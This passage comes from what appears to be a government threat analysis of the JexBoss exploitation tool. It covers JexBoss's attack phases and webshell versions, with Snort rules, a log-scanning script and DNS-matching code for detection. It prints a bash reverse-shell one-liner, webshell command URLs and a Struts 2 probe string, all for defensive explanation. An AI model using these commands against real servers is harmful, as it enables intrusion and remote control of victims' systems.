      • The success of this attempt is indicated by the phrase: "Successfully deployed code!"
    • Command and Control (C2): JexBoss successfully executed OS commands.
      • The success of this attempt is indicated by the output of the uname -a command, which starts with "Linux 2f8c3354a075 4.13.0-38".
    • Action on Objectives: JexBoss successfully attempted this phase, as evidenced by the presence of the Shell> prompt.
      • The attacker can use the interactive Shell> prompt to access the JexBoss webshell to execute OS commands and see the command output.

    Automated Exploitation

    The auto-scan and file-scan modes of JexBoss will, by default, only perform the vulnerability scan and report the results. To exploit vulnerabilities when using these modes, the attacker must specify the -A/--auto-exploit option. The -A/--auto-exploit option can also be used in standalone mode, which will remove the yes or no questions asking whether to run automated exploitation, as well as the access to the webshell via the Shell> prompt.

    Webshell Installation

    JexBoss can use a number of different exploits to attempt to install the JexBoss webshell (e.g., exploitation of the JMX console). Once installed, the webshell grants the attacker the ability to execute OS commands remotely by accessing the webshell URL over HTTP or HTTP Secure (HTTPS). The webshell also enables the attacker to receive the command output in response. See the Webshell Analysis section for a description of the JexBoss webshell's capabilities.


    JexBoss will attempt to exploit the vulnerable component to upload the webshell code over the HTTP session and install the webshell into the web server. If this is not successful, and depending upon the vulnerability, JexBoss may attempt to exploit the vulnerability to induce the web server to download and install the webshell from the internet.

    When used in standalone mode, JexBoss allows the attacker to use the webshell through the interactive Shell> prompt by default, as shown in figure 4.

    Blind Command Injection

    In cases where the installation of the webshell fails or is not possible, such as with application Java deserialization vulnerabilities, JexBoss will attempt to perform a blind command injection. A blind command injection sends a payload, created by the attacker and containing an OS command, to the vulnerable component. The vulnerable component processes the payload insecurely and executes the embedded OS command. After the embedded OS command is executed, the output of this execution is not returned to the attacker; therefore, the command injection occurs "blindly." The attacker can only determine whether the command was executed successfully by observing the effects of the command execution.

    JexBoss automates the creation and delivery of the payload. When attempting a blind command injection, the default OS command JexBoss packages in the payload is a Linux-specific command to create a reverse shell (see the Reverse Shell section).

    Alternatively, the attacker can specify a different OS command to be executed using the --cmd CMD option. As shown in figure 5, the CMD value is the alternate OS command.

    Note: using the --cmd option in the auto-scan and file-scan modes requires using the -A/--auto-exploit option, otherwise the --cmd option will be ignored.

    A screenshot of the JexBoss tool specifying the injection of an operating system command with the "--cmd" option

    Figure 5: Specifying injected OS command with the --cmd option

    In addition to the exploits against the vulnerable Java-based applications and frameworks shown in figure 2, JexBoss also supports the exploitation of arbitrary Java deserialization vulnerabilities with blind command injection attacks. To accomplish this, the attacker supplies a URL with the -host/-u option, an application parameter into which the payload will be injected with the -H/--post-parameter PARAMETER option, and the -j/--app-unserialize option.

    Reverse Shell

    A reverse shell is a common technique attackers use to execute commands interactively (with keyboard input and text output) through the target system's built-in command-line programs. JexBoss relays the input and output of the command-line program (usually the Bash command language interpreter on Linux targets and cmd.exe on Windows targets) through a TCP connection initiated by the target to an IP address and a port of the attacker's choosing.

    The JexBoss webshell includes the capability to establish a reverse shell. If the attacker issues the jexremote=IP:PORT command to the webshell, the webshell will initiate a connection to the specified IP address and TCP port using Java's Socket class and relay OS commands to, and output from, the command-line program through that connection. An example of the jexremote command is shown in figure 4.

    Establishing a reverse shell can also be performed using blind command injection. The default OS command JexBoss packages in the exploit payload to create a reverse shell is

    /bin/bash -i > /dev/tcp/IP/PORT 0&>1 2>&1

    (where IP and PORT are specified by the attacker). This command redirects the standard input and output of the Bash shell through the victim Linux kernel's built-in TCP device. For blind command injection, JexBoss obtains the IP and PORT values either from the values supplied in the -r/--reverse-host RHOST:RPORT option, or by prompting the attacker for those values, as shown in figure 6.

    A screenshot of JexBoss obtaining the IP and PORT for the reverse shell

    Figure 6: JexBoss screenshot - JexBoss obtaining the IP and PORT for the reverse shell

    To establish the TCP connection for the reverse shell, the computer with the IP address specified by the attacker must listen for connections on the specified TCP port. The program that listens for these connections must be able to accept user command-line input and display text output.

    A common tool used to listen for reverse shell connections is Netcat. Figure 7 shows Netcat being used to listen for incoming connections on TCP port 4444. After the reverse shell is established, Netcat shows the shell prompt. The attacker then uses the reverse shell to display the /etc/passwd file to get a listing of user accounts on the target.

    A screenshot of JexBoss that shows the reverse shell using an Netcat listener

    Figure 7: JexBoss screenshot - reverse shell using a Netcat listener

    Attackers often use tools that are more sophisticated than Netcat, such as Meterpreter, to listen for reverse shell connections and control the reverse shell.

    Observable Network Behavior

    Security analysts can observe JexBoss' behavior through passive network traffic monitoring. The observable content depends upon the location of the organization's network traffic monitoring sensor. Communication between the attacker and the target can be observed at any in-line point, on either the attacker's local network or the target's local network. Figure 8 shows an organization's typical network sensor architecture, including a passive sensor monitoring the packets traversing the organization's primary ingress and egress points.

    Illustration that shows an organization's typical network sensor location between the organization's network and the internet service provider

    Figure 8: Typical organization's network sensor location

    Version Checks

    Upon its initial execution in any of the scan modes, JexBoss will attempt to retrieve its version information from the internet by reaching out to the following URL:

    hxxp[:]//joaomatosf.com/rnp/releases.txt

    Note: all URLs have been modified to prevent unintentional access.

    If the version of JexBoss being used is not the latest version, the attacker will see a message recommending an upgrade.

    Some versions of the JexBoss webshell include a version check function, which can determine if the webshell being used is the latest version. The target computer will retrieve the latest available webshell version number from the following URL:

    hxxp[:]//webshell.jexboss.net/jsp_version.txt.

    If the installed webshell is not the latest available version, the attacker will see an HTTP response that includes a message recommending the webshell be upgraded, once the attacker accesses the webshell.

    Note: both of the JexBoss version checks detailed above will be evident to an affected organization. The organization will be able to see a lookup of the joaomatosf.com or webshell.jexboss.net domains in their Domain Name System (DNS) queries. These URLs will also be present in the organization's HTTP traffic. When these artifacts are found on an organization's network, they indicate JexBoss is present, which is a potential security risk and should be investigated.

    The attacker using JexBoss can disable both version checks by using the -D/--disable-check-updates option.

    Webshell Download

    If the installation of the JexBoss webshell fails, JexBoss may attempt to induce the target server to download and install the JexBoss webshell from the internet at the following URL:

    hxxp[:]//www.joaomatosf.com/rnp/jexws4.war

    If the hxxp[:]//www.joaomatosf.com/rnp/jexws4.war domain or URL is present in an organization's DNS and HTTP logs, this indicates the JexBoss webshell may be present on the organization's network. Any organization that identifies this activity should investigate it.

    Note: the filename of the webshell downloaded may change. The public webshell files on hxxp[:]//www.joaomatosf.com reveal multiple jexws*.war files, all of which have basically the same content, but with different MD5 checksums. Using different MD5 checksums allows older versions of JexBoss to induce the web server to download the latest version of the webshell.

    Attack Communication Parameters

    Communications between the attacker and target occur over HTTP or HTTPS, depending upon the target's web server configuration. HTTPS communications, typically over TCP port 443 or 8443, are encrypted. Organizations that use reverse proxies or some configurations of web application firewalls may be able to observe decrypted network traffic between the perimeter device and the web server. Otherwise, the signs of an attack over HTTPS will only be observable in network appliance logs or on the web server itself.

    Note: for the remainder of this report, unless otherwise noted, network traffic is assumed to be unencrypted HTTP, typically over port 80 or 8080.

    When JexBoss starts, it randomly selects one User-Agent header value from the list in table 1 to use for all HTTP requests to the target web server. The User-Agent values listed in table 1 are legitimate, helping JexBoss traffic blend in with legitimate HTTP traffic. However, they are also dated, which may help organizations differentiate them from normal HTTP traffic.

    Table 1: JexBoss User-Agent header value choices

    HTTP User-Agent Header Value Choices
    Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:38.0) Gecko/20100101 Firefox/38.0
    Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0
    Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36
    Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/601.3.9 (KHTML, like Gecko) Version/9.0.2 Safari/601.3.9
    Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
    Mozilla/5.0 (Windows NT 5.1; rv:40.0) Gecko/20100101 Firefox/40.0
    Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
    Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.1)
    Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
    Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
    Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36
    Opera/9.80 (Windows NT 6.2; Win64; x64) Presto/2.12.388 Version/12.17
    Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0
    Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0

    Because JexBoss is written in Python, it is easy for sophisticated attackers to alter some of the static data sent to the target web server, including the User-Agent header value choices and parts of the exploits themselves, which would make signature-based detection ineffective.

    Attack Phases

    NCCIC has assessed that JexBoss operates at all seven steps in the Cyber Kill Chain framework. Due to the nature of the vulnerabilities and how they are exploited, JexBoss combines some of the steps, resulting in three high-level phases:

    • Phase 1: Reconnaissance;
    • Phase 2: Weaponization, Delivery, Exploitation, and Installation; and
    • Phase 3: C2 and Action on Objectives.

    Phase 1: Reconnaissance

    In Phase 1, JexBoss determines which components of the target web server, if any, are exposed and vulnerable. JexBoss connects to the target web server multiple times and makes multiple HTTP requests, using the GET and HEAD methods, to gather this information (see figure 9).

    A screenshot showing a typical Uniform Resource Identifier (URI) probe

    Figure 9: Typical Uniform Resource Identifier (URI) probe

    Aside from the references to JexBoss in some URLs, most of these requests look legitimate or benign, with one notable exception, shown in figure 10.

    A screenshot showing code from the JexBoss-specific Apache Struts 2 probe

    Figure 10: JexBoss-specific Apache Struts 2 probe

    The HTTP request shown in figure 10 almost exactly matches the exploit of the Apache Struts 2 vulnerability (CVE-2017-5638) published by Vex Woo in March 2017.[3] However, JexBoss customizes two parts of this snippet by using #gift and #giftarray (instead of #cmd and #cmds) and by using jexboss as the command, which uniquely identifies the activity as being related to JexBoss.

    Note: the HTTP request shown in figure 10 attempts to exploit the Apache Struts 2 vulnerability; however, there is no command execution in this phase. JexBoss is only trying to determine if an exploit is possible.

    Network defenders can deploy intrusion detection system (IDS) signatures, such as those found in the Network IDS and IPS Signatures section, to detect JexBoss' initial reconnaissance activity. However, some of these signatures will fire on attempted exploits, not just successful exploits, which limits their value to the defender.

    Phase 2: Weaponization, Delivery, Exploitation, and Installation

    JexBoss weaponizes exploits in different ways, depending upon the vulnerability being exploited. For example, to exploit the Apache Struts 2 vulnerability (CVE-2017-5638), JexBoss packages the exploit and the OS command to run in the Content-Type HTTP header value that will be delivered to the target web server in an HTTP GET request (see figure 10).

    JexBoss delivers exploits to the target web server over HTTP using GET or POST requests for URIs and data specific to the vulnerabilities.

    The exploits JexBoss uses are vulnerability-specific. For example, the attack against the admin-console exploits weak configurations of JBoss AS by simply attempting to log in with a username and password. Other attacks attempt to exploit Java deserialization vulnerabilities to install the JexBoss webshell or to execute OS commands.

    Figure 11 shows an example of the weaponization of the JexBoss webshell delivered as a URI query parameter in an HTTP HEAD request, exploiting a vulnerability in the JMX Console (a component of JBoss AS). If this exploit is successful, the victim web server will install the JexBoss webshell.

    A screenshot showing an example of a JexBoss webshell in a URI query parameter

    Figure 11: Example of JexBoss webshell in URI query parameter

    The packet dump shown in figure 12 is an example of the JexBoss webshell weaponized as a Java serialized object delivered to the JMX Invoker Servlet (another component of JBoss AS) in an HTTP POST request. The serialized object in this example (figure 11) begins with the bytes \xAC\xED at byte position 0x01c4, that is, 452 bytes into the HTTP request.

    A screenshot that shows an example of a JexBoss webshell packaged in a Java serialized object

    Figure 12: Example of JexBoss webshell packaged in a Java serialized object

    To test whether the installation of the webshell has succeeded, JexBoss will submit an HTTP GET request to the target web server for one of the following URLs:

    • hxxp[:]//victim/jexws4/jexws4.jsp, or
    • hxxp[:]//victim/jexinv4/jexinv4.jsp.

    Packet number 22 in figure 13 indicates the test for successful webshell installation. Packet number 24, the HTTP response to packet number 22, is an HTTP 200 OK message that indicates the webshell installation was successful. An HTTP 404 Not Found message in response indicates that the webshell installation failed.

    A screenshot showing the JexBoss webshell access packet list

    Figure 13: JexBoss webshell access packet list

    Phase 3: C2 and Actions on Objectives

    If JexBoss succeeds in installing the JexBoss webshell on the victim web server, the webshell will allow the attacker to issue OS commands for execution through HTTP GET requests as follows:

    hxxp[:]//victim/jexws4/jexws4.jsp?ppp=<url-encoded-OS-command>

    For example, the packet contents displayed in figure 14 show that the attacker issued the id OS command to the webshell. In figure 14, the victim web server provided the OS command execution output in the HTTP response.

    A screenshot of the HTTP contents of the JexBoss webshell command

    Figure 14: JexBoss webshell command HTTP contents

    When JexBoss is run in standalone mode, JexBoss will issue three specific commands sequentially, after the successful installation of the webshell, upon initial exploitation of a Linux server. These commands are listed in table 2.

    Table 2: JexBoss' default initial Linux commands

    Command          Description of Action
    uname -a         Retrieves host information
    cat /etc/issue   Retrieves Linux OS information
    id               Determines the user under which commands will run

    Security analysts can observe the attempted execution of these three commands in web server logs, even if the HTTP communication is encrypted with Transport Layer Security or Secure Sockets Layer. Analyzing web server logs for this activity is an additional way organizations can confirm the presence of JexBoss.
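    A log-side check for the activity described above, added here as an example (it is not code from the NCCIC report or from the JexBoss project): it parses combined-format web server access log lines, flags requests for the webshell URIs and the ppp query parameter, and reports the source hosts that issued the table 2 command sequence through the webshell. The log lines in SAMPLE_LOG are constructed samples, not captured traffic.

```python
"""Flag JexBoss webshell activity in web server access logs.

Added example, not part of the NCCIC report or the JexBoss project. It
assumes the Apache/nginx "combined" log format; the lines in SAMPLE_LOG
are constructed, not captured traffic.
"""
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# combined format: host ident user [time] "method target proto" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<agent>[^"]*)"$'
)

# Webshell URIs JexBoss requests after an exploit attempt (jexws4, jexinv4, ...).
WEBSHELL_PATH_RE = re.compile(r"/(jexws\d*|jexinv\d*|jbossass)/[^/?]*\.jsp$", re.I)

# The three commands JexBoss issues, in order, right after installing the
# webshell on a Linux server in standalone mode (table 2).
INITIAL_COMMANDS = ("uname -a", "cat /etc/issue", "id")

UA = "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0"  # table 1 value
SAMPLE_LOG = f"""\
203.0.113.5 - - [10/Nov/2018:10:00:01 +0000] "HEAD /jmx-console/ HTTP/1.1" 200 - "-" "{UA}"
203.0.113.5 - - [10/Nov/2018:10:00:02 +0000] "GET /jexws4/jexws4.jsp HTTP/1.1" 200 512 "-" "{UA}"
203.0.113.5 - - [10/Nov/2018:10:00:03 +0000] "GET /jexws4/jexws4.jsp?ppp=uname%20-a HTTP/1.1" 200 120 "-" "{UA}"
203.0.113.5 - - [10/Nov/2018:10:00:04 +0000] "GET /jexws4/jexws4.jsp?ppp=cat%20/etc/issue HTTP/1.1" 200 80 "-" "{UA}"
203.0.113.5 - - [10/Nov/2018:10:00:05 +0000] "GET /jexws4/jexws4.jsp?ppp=id HTTP/1.1" 200 60 "-" "{UA}"
198.51.100.9 - - [10/Nov/2018:11:00:00 +0000] "GET /jexinv4/jexinv4.jsp?ppp=id HTTP/1.1" 404 200 "-" "curl/7.58.0"
192.0.2.20 - - [10/Nov/2018:11:05:00 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not parse."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    rec["query"] = parse_qs(parts.query, keep_blank_values=True)  # percent-decoded
    rec["status"] = int(rec["status"])
    return rec


def classify(rec):
    """Return the JexBoss indicators present in one parsed record."""
    findings = []
    if WEBSHELL_PATH_RE.search(rec["path"]):
        # 200 OK means the webshell answered, i.e. it is installed; any other
        # status (404 in the report) means this was only a probe.
        findings.append("webshell_installed" if rec["status"] == 200 else "webshell_probe")
    if "ppp" in rec["query"]:
        findings.append("ppp_command:" + rec["query"]["ppp"][0])
    if rec["agent"].strip().lower() == "jexboss":  # the original webshell required this UA
        findings.append("jexboss_user_agent")
    return findings


def contains_subsequence(seq, sub):
    """True if the items of sub appear in seq in order (not necessarily adjacent)."""
    it = iter(seq)
    return all(any(x == s for x in it) for s in sub)


def scan(lines):
    """Return (findings, hosts): each indicator with its source host and path, plus
    the hosts that issued the table 2 command sequence through the webshell."""
    findings = []
    cmds_by_host = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        for f in classify(rec):
            findings.append((rec["host"], rec["path"], f))
            if f.startswith("ppp_command:"):
                cmds_by_host[rec["host"]].append(f.split(":", 1)[1].strip())
    hosts = sorted(h for h, c in cmds_by_host.items()
                   if contains_subsequence(c, INITIAL_COMMANDS))
    return findings, hosts


if __name__ == "__main__":
    found, hosts = scan(SAMPLE_LOG.splitlines())
    for host, path, what in found:
        print(f"{host} {path} {what}")
    print("hosts that ran the default JexBoss command sequence:", hosts)
```

    The X-JEX header (webshell version 4) is not recorded in a standard access log, so that channel is only visible to the network rules in table 4 or to custom logging.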

    For vulnerabilities exploited through blind command injection, there is no installation step. JexBoss achieves the Cyber Kill Chain steps C2 and Actions on Objectives (i.e., Phase 3 in the Attack Phases section) by packaging OS commands directly in the exploit payload and delivering the payload to the vulnerable component; therefore, there is no distinction between Phase 2 and Phase 3 in blind command injection.

    The partial packet hexdump shown in figure 15 is an example of the C2 step with blind command injection. In this example, JexBoss packages and delivers an OS command that attempts to establish a reverse shell, described in the Reverse Shell section.

    A screenshot of a JexBoss packet hexdump that includes a reverse shell OS command

    Figure 15: JexBoss packet hexdump including reverse shell OS command

    While a reverse webshell can help attackers achieve C2, it is also easy to detect. An organization's network web servers do not typically make outbound connections to arbitrary internet hosts; therefore, connections like these would be a red flag for network defenders. In the network capture shown in figure 16, the victim server has established a connection back to the attacker's system via TCP port 4444.

    A screenshot showing the JexBoss reverse webshell establishment packet list

    Figure 16: JexBoss reverse webshell establishment packet list

    An unusual outbound connection, like the one illustrated in figure 16, would stand out to an experienced network defender; the network defender's awareness of the anomalous behavior increases the attacker's risk of detection. Many organizations choose to filter outbound connections, which would stop an attempt like the one illustrated in figure 16.

    Attackers can execute JexBoss commands without a webshell or reverse webshell by using the --cmd option, as described in the Blind Command Injection section. A clever attacker could issue commands to perform complex tasks and exfiltrate data. For example, the attacker may create a script that collects data and sends it to another location on the victim network for later retrieval.

    Webshell Analysis

    If the JexBoss webshell is installed on the victim web server, JexBoss can access the webshell by issuing HTTP GET requests to the appropriate .jsp file (e.g., jexws4/jexws4.jsp), using the optional ppp query parameter, the value of which is used as the OS command to execute on the victim web server.

    There are three main versions of the JexBoss webshell: the original version (November 30, 2014), version 2 (April 23, 2016), and version 4 (the current version). Each subsequent JexBoss webshell version can be considered an upgrade over the previous version, offering additional capabilities, as described in table 3.

    Table 3: JexBoss webshell functionality by version

    Webshell Version / Functionality

    Original (November 30, 2014)
    • Executes OS commands specified in the ppp HTTP query parameter using Java's Runtime.exec() method and returns the output of the command execution in the HTTP response
    • Requires the User-Agent: jexboss HTTP header

    Version 2 (April 23, 2016)
    • Checks the webshell version if the check-updates HTTP header value is not set to false (see the Version Checks section)
    • Does not require the User-Agent: jexboss HTTP header
    • Executes OS command using Java's Runtime.exec() method
      • Uses cmd.exe /C for Windows OSs
      • Uses /bin/bash -c for non-Windows OSs

    Version 4 (Current)
    • If the ppp HTTP query parameter is not specified, checks for the X-JEX HTTP header and, if present, uses the value of that header as the OS command
    • If the OS command is in the format jexremote=IP:PORT, establishes a reverse shell (using cmd.exe or /bin/bash, depending upon the web server OS) with the specified IP address and port using Java's Socket class

    JexBoss webshell version 2 is the latest version available on GitHub, as described in the Version Checks section. This version check uses a User-Agent HTTP header value that includes information about the attacker's webshell access: the host HTTP header value and the IP address of the attacker host. This collection of host and IP information indicates that JexBoss' author may leverage attackers' use of the tool to collect a list of attacking IPs and exploited servers.

    The latest version of the webshell available on joaomatosf[.]com is version 4. At the time of this report's publication, NCCIC has been unable to acquire version 3 for analysis.

    Solution

    NCCIC recommends a defense-in-depth approach to mitigating the risks of JexBoss.

    Best Practices

    The best way to defend against JexBoss is to ensure that servers are not vulnerable to the exploits it uses. The vulnerabilities exploited by JexBoss can also be exploited by other tools. Once an organization has remediated the vulnerabilities associated with JexBoss, the organization's servers will be less prone to other tools that leverage the same exploits.

    Best practices include

    • Keeping OSs, web servers, and applications up-to-date;
    • Securing access to administrative consoles;
    • Using non-privileged accounts with limited capabilities to run servers;
    • Reviewing server logs to identify indications of a successful compromise; and
    • Frequently testing organization systems and applications for the latest vulnerabilities via automated vulnerability scans.

    Because JBoss AS is no longer supported by the vendor, organizations using JBoss AS should migrate their existing JBoss AS instances to the supported equivalent, such as WildFly or the JBoss Enterprise Application Platform. Because JexBoss can be used to exploit a variety of other Java-based frameworks (e.g., Apache Struts, Java Server Faces, Jenkins), users should keep these frameworks updated, or remove them if they are not necessary.

    Detection Strategies

    An organization's security operations team can monitor for attempted and successful JexBoss exploit attacks using a variety of methods. NCCIC recommends the following detection strategies:

    • Update network IDS and IPS signatures.
    • Analyze behavioral indicators.
    • Analyze on-server artifacts.

    Network IDS and IPS Signatures

    Many organizations deploy Snort or Suricata IDSs in commercial appliances, or as standalone platforms on commodity hardware, and leverage signatures written by Snort, Emerging Threats, and others in the cybersecurity community. Tables 4 and 5 provide signatures developed by NCCIC and other organizations. Signatures that were created by outside organizations reference the appropriate signature identifier.

    NCCIC assesses the Snort rules in table 4 to be high-confidence indicators of potentially dangerous JexBoss webshell network behavior.

    Table 4: JexBoss webshell Snort signatures/rules

    Rule 1. JexBoss behavior: attempts to issue a command to the JexBoss webshell with the ppp query parameter
    alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"JexBoss webshell command ppp submission"; flow:established,to_server; content:".jsp?ppp="; http_uri; fast_pattern:only; classtype:trojan-activity; reference:url,github.com/joaomatosf/jexboss; sid:X; rev:1;)

    Rule 2. JexBoss behavior: attempts to issue a command to the JexBoss webshell with the X-JEX HTTP header field
    alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"JexBoss webshell command X-JEX submission"; flow:established,to_server; content:"X-JEX"; http_header; fast_pattern:only; classtype:trojan-activity; reference:url,github.com/joaomatosf/jexboss; sid:X; rev:1;)

    Rule 3. JexBoss behavior: attempts by the successfully exploited server to download the JexBoss webshell from the internet
    alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:"JexBoss webshell download"; flow:established,to_server; content:"rnp/jexws4.war"; http_uri; fast_pattern:only; classtype:trojan-activity; reference:url,github.com/joaomatosf/jexboss; sid:X; rev:1;)

    Rule 4. JexBoss behavior: DNS queries for the JexBoss webshell version check and alternate download location
    alert udp $HOME_NET any -> any 53 (msg:"DNS query for JexBoss alternate domain"; flow:to_server; byte_test:1,!&,0xF8,2; content:"|08|webshell|07|jexboss|03|net|00|"; fast_pattern:only; classtype:trojan-activity; reference:url,github.com/joaomatosf/jexboss; sid:X; rev:1;)
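    To show what the DNS rule in table 4 (rule 4), and the matching author-domain rule in table 5, actually test for, here is an added example that is not code from the report: it encodes a name the way the content: pattern spells it (one length byte per label), reproduces the byte_test flags check, and runs both against constructed query packets that are never sent.

```python
"""Match DNS queries for the JexBoss domains watched by the report's Snort rules.

Added example, not part of the NCCIC report or the JexBoss project. The
packets below are constructed with build_query(); nothing goes on the wire.
"""
import struct

# Domains named in the report's DNS rules and what a hit means to the defender.
WATCHED = {
    "webshell.jexboss.net": "webshell version check / alternate download location",
    "joaomatosf.com": "JexBoss author domain (also hosts non-JexBoss content)",
}


def encode_qname(name):
    """DNS wire-format name: a length byte before each label, 0x00 at the end.
    'webshell.jexboss.net' -> |08|webshell|07|jexboss|03|net|00|, exactly the
    bytes the content: match in table 4, rule 4 looks for."""
    out = bytearray()
    for label in name.rstrip(".").split("."):
        out.append(len(label))
        out += label.encode("ascii")
    out.append(0)
    return bytes(out)


def decode_qname(payload, offset=12):
    """Read the question name starting at offset (12 = DNS header length)."""
    labels = []
    while True:
        length = payload[offset]
        offset += 1
        if length == 0:
            break
        labels.append(payload[offset:offset + length].decode("ascii"))
        offset += length
    return ".".join(labels)


def is_standard_query(payload):
    """Snort byte_test:1,!&,0xF8,2 -> the byte at offset 2 (high byte of the DNS
    flags) AND 0xF8 must be zero, i.e. QR=0 and Opcode=0: a standard query."""
    return len(payload) > 12 and (payload[2] & 0xF8) == 0


def match_dns(payload):
    """Return (domain, description) when the packet is a standard query whose name
    contains a watched domain, else None. Substring matching on the encoded name
    is what the Snort rules do, so subdomains such as www.joaomatosf.com hit too."""
    if not is_standard_query(payload):
        return None
    for domain, desc in WATCHED.items():
        if encode_qname(domain) in payload:
            return domain, desc
    return None


def build_query(name, txid=0x1234, qtype=1, flags=0x0100):
    """Constructed sample DNS packet: header plus one question (type A, class IN).
    flags=0x0100 is a standard recursive query; 0x8180 would be a response."""
    header = struct.pack(">HHHHHH", txid, flags, 1, 0, 0, 0)
    return header + encode_qname(name) + struct.pack(">HH", qtype, 1)


if __name__ == "__main__":
    for q in ("www.joaomatosf.com", "webshell.jexboss.net", "example.com"):
        pkt = build_query(q)
        print(decode_qname(pkt), "->", match_dns(pkt))
```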

    When run against real-world network traffic, NCCIC generated alerts for rule 1 in table 4 above. The URI pattern for these alerts was /jexinv4/jexinv4.jsp?ppp=<cmd>, where <cmd> was a long Linux command that tried to induce the server to download and execute a Linux webshell script from an internet location. This attempt to access the JexBoss webshell was one of several unrelated HTTP requests from the same source IP to the same target IP, likely indicating scanning activity to determine if the server was already compromised by any of a number of tools, including JexBoss.

    As noted in the Attacker to Victim Network Behavior section, an HTTP 200 OK message response from the server would indicate that the webshell was installed on the server. However, the response observed in the NCCIC environment was an HTTP 302 Redirect message, which instructed the client to repeat the request over HTTPS. NCCIC did not observe any such HTTPS traffic. Most likely the presumed scanning tool used to generate the HTTP traffic was not able to properly handle the HTTP 302 response.

    Table 5 provides the Snort rules that indicate JexBoss activity but do not necessarily indicate successful JexBoss exploitation. Rule 5 in table 5 below alerts on traffic to the JexBoss author's domain, which, in addition to JexBoss webshells, contains non-JexBoss content.

    Table 5: Snort signatures identifying JexBoss attempts

    Rule 1. Network activity: DNS queries for the JexBoss author's domain
    alert udp $HOME_NET any -> any 53 (msg:"DNS query for JexBoss author domain joaomatosf.com"; flow:to_server; byte_test:1,!&,0xF8,2; content:"|0A|joaomatosf|03|com|00|"; fast_pattern:only; classtype:trojan-activity; reference:url,github.com/joaomatosf/jexboss; sid:X; rev:1;)

    Rule 2. Network activity: detects the JexBoss-specific probe of the Apache Struts 2 vulnerability (CVE-2017-5638)
    alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS any (msg: "JexBoss Apache Struts 2 Probe or exploit"; flow:established,to_server; content: "GET"; http_method; content: "(#giftarray=(#isnix?{'/bin/bash','-c',#gift}:{'cmd.exe','/c',#gift}))"; fast_pattern; classtype:trojan-activity; reference:url,github.com/joaomatosf/jexboss; sid: X; rev:1;)

    Rule 3. Network activity: the HTTP User-Agent header value specific to JexBoss (for the deprecated version 1 of the webshell)
    alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:" JexBoss User-Agent"; flow:established,to_server; content: "GET"; http_method; content:"jexboss"; http_user_agent; fast_pattern:only; classtype:trojan-activity; reference:url,github.com/joaomatosf/jexboss; sid:X; rev:1;)

    Behavior Analysis of Network Activity

    The Snort signatures described in the Network IDS and IPS Signatures section may allow organizations to detect some JexBoss attacks. However, attackers attempting to use stealthier techniques may be able to tune their attacks to avoid detection from these signatures.

    By analyzing the behavior surrounding the attack, either manually or by using automated tools, network defenders may be able to determine whether an attack has succeeded. NCCIC's recommended analysis methods include searching for the following:

    • Unusual outbound connection attempts from the server
      • Unusual outbound connection attempts may indicate an attacker attempting to initiate a reverse webshell or exfiltrate data.
    • Unusual internet downloads from the server
      • Unusual internet downloads may indicate that an attacker is attempting to obtain tools to perform additional attacks (e.g., Mimikatz, SQLMap).
    • Unusual URIs being served by the webserver
      • The presence of unusual URIs may indicate the installation of a webshell, as is the case when jexws4/jexws4.jsp is used.
    • Embedded OS commands
      • Network defenders should specifically search for OS commands embedded in HTTP query parameters, HTTP header values, and HTTP POST data in the contents of the organization's network traffic. For example, the command in the Apache Struts 2 exploit is visible in cleartext in the Content-Type header. NCCIC recommends organizations analyze their servers to identify evidence that OS commands like these have been executed, the presence of which indicates a successful attack.

    Combining the automated analysis of signatures and behavioral indicators may significantly improve false-positive rates and time-to-detection.

    On-Server Artifacts

    The JexBoss webshell files included on the JexBoss GitHub page, and available on the joaomatosf[.]com website, are Web Application aRchive (WAR) format files, with the file extension .war. These WAR files are basically ZIP files containing the file jexws.jsp, which is the file in the URI that JexBoss requests in order to perform command execution. The JexBoss webshell .war and .jsp file names may start with jexws2, jexws3, jexws4, or jbossass.

    Tables 6, 7, and 8 include filenames and their associated MD5 checksums for the files related to the JexBoss webshell. Network defenders should search for these files on their organization's web server file systems; their presence indicates a JexBoss webshell.

    The webshell files provided on the JexBoss GitHub page are identified in table 6.

    Table 6: JexBoss webshells on GitHub

    Filename | Webshell Version | Size (bytes) | MD5 Checksum
    jbossass.war | 1 | 685 | cbdeaf83f58a64b09df58b94063e0146
    jexws.war and jbossas.war | 2 | 1296 | 3f156bd68b2a32a1b5cb03af318667f0

